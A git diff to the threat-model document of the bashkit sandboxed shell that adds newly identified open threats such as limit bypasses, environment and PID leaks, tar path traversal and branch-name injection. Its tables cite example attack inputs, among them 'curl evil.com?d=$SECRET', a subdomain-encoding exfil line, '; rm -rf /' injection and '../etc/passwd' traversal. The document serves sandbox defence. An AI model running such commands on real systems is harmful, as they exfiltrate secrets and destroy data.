everruns · chaliy · Mar 1, 2026 · Mar 1, 2026 · Mar 1, 2026 · Mar 1, 2026
diff --git a/crates/bashkit/docs/threat-model.md b/crates/bashkit/docs/threat-model.md
@@ -36,7 +36,13 @@ through configurable limits.
 | Parser attack (TM-DOS-024) | Malformed input | `parser_timeout` | [`limits.rs`][limits] |
 | Filesystem bomb (TM-DOS-007) | Zip bomb extraction | `FsLimits` | [`fs/limits.rs`][fslimits] |
 | Many files (TM-DOS-006) | Create 1M files | `max_file_count` | [`fs/limits.rs`][fslimits] |
+| TOCTOU append (TM-DOS-034) | Concurrent appends bypass limits | Single write lock | **OPEN** |
+| OverlayFs limit gaps (TM-DOS-035-038) | CoW/whiteout/accounting bugs | Combined limit accounting | **OPEN** |
+| Missing validate_path (TM-DOS-039) | VFS methods skip path checks | Add to all methods | **OPEN** |
 | Diff algorithm DoS (TM-DOS-028) | `diff` on large unrelated files | LCS matrix cap (10M cells) | [`builtins/diff.rs`][diff] |
+| Arithmetic overflow (TM-DOS-029) | `$(( 2 ** -1 ))` | Use wrapping arithmetic | **OPEN** |
+| Parser limit bypass (TM-DOS-030) | eval/source ignore limits | Use `Parser::with_limits()` | **OPEN** |
+| ExtGlob blowup (TM-DOS-031) | `+(a\|aa)` exponential | Add depth limit | **OPEN** |
 
 **Configuration:**
 ```rust,ignore
@@ -74,6 +80,8 @@ Scripts may attempt to break out of the sandbox to access the host system.
 | Shell escape (TM-ESC-005) | `exec /bin/bash` | Not implemented | Returns exit 127 |
 | External commands (TM-ESC-006) | `./malicious` | No external exec | Returns exit 127 |
 | eval injection (TM-ESC-008) | `eval "$input"` | Sandboxed eval | Only runs builtins |
+| VFS limit bypass (TM-ESC-012) | `add_file()` skips limits | Restrict API visibility | **OPEN** |
+| Custom builtins lost (TM-ESC-014) | `std::mem::take` empties builtins | Clone/Arc builtins | **OPEN** |
 
 **Virtual Filesystem:**
 
@@ -102,6 +110,9 @@ Scripts may attempt to leak sensitive information.
 | Env var leak (TM-INF-001) | `echo $SECRET` | Caller responsibility | See below |
 | Host info (TM-INF-005) | `hostname` | Returns virtual value | [`builtins/system.rs`][system] |
 | Network exfil (TM-INF-010) | `curl evil.com?d=$SECRET` | Network allowlist | [`network/allowlist.rs`][allowlist] |
+| Host env via jq (TM-INF-013) | jq `env` exposes host env | Custom env impl | **OPEN** |
+| Real PID leak (TM-INF-014) | `$$` returns real PID | Return virtual value | **OPEN** |
+| Error msg info leak (TM-INF-016) | Errors expose host paths/IPs | Sanitize error messages | **OPEN** |
 
 **Caller Responsibility (TM-INF-001):**
 
@@ -196,6 +207,9 @@ exfiltration by encoding secrets in subdomains (`curl https://$SECRET.example.co
 | Command injection (TM-INJ-001) | `$input` containing `; rm -rf /` | Variables expand to strings only |
 | Path injection (TM-INJ-005) | `../../../../etc/passwd` | Path normalization |
 | Terminal escapes (TM-INJ-008) | ANSI sequences in output | Caller should sanitize |
+| Internal var injection (TM-INJ-009) | Set `_READONLY_X=""` | Isolate internal namespace | **OPEN** |
+| Tar path traversal (TM-INJ-010) | `tar -xf` with `../` entries | Validate extract paths | **OPEN** |
+| Cyclic nameref (TM-INJ-011) | Cyclic refs resolve silently | Detect cycle, error | **OPEN** |
 
 **Variable Expansion:**
 
@@ -331,6 +345,11 @@ Python `pathlib.Path` operations are bridged to Bashkit's virtual filesystem.
 | Path traversal (TM-PY-017) | `../../etc/passwd` | VFS path normalization |
 | Network access (TM-PY-020) | Socket/HTTP | Monty has no socket/network module |
 | VM crash (TM-PY-022) | Malformed input | Parser depth limit + resource limits |
+| Shell injection (TM-PY-023) | deepagents.py f-strings | Use shlex.quote() | **OPEN** |
+| Heredoc escape (TM-PY-024) | Content contains delimiter | Random delimiter | **OPEN** |
+| GIL deadlock (TM-PY-025) | execute_sync holds GIL | py.allow_threads() | **OPEN** |
+| Config lost on reset (TM-PY-026) | reset() drops limits | Preserve config | **OPEN** |
+| JSON recursion (TM-PY-027) | Nested dicts overflow stack | Add depth limit | **OPEN** |
 
 **Architecture:**
 
@@ -356,6 +375,7 @@ to the virtual filesystem.
 | Many git objects (TM-GIT-007) | Millions of objects | `max_file_count` FS limit | MITIGATED |
 | Deep history (TM-GIT-008) | Very long commit log | Log limit parameter | MITIGATED |
 | Large pack files (TM-GIT-009) | Huge .git/objects/pack | `max_file_size` FS limit | MITIGATED |
+| Branch name injection (TM-GIT-014) | `git branch ../../config` | Validate branch names | **OPEN** |
 | Unauthorized clone (TM-GIT-001) | `git clone evil.com` | Remote URL allowlist | PLANNED (Phase 2) |
 | Push to unauthorized (TM-GIT-010) | `git push evil.com` | Remote URL allowlist | PLANNED (Phase 2) |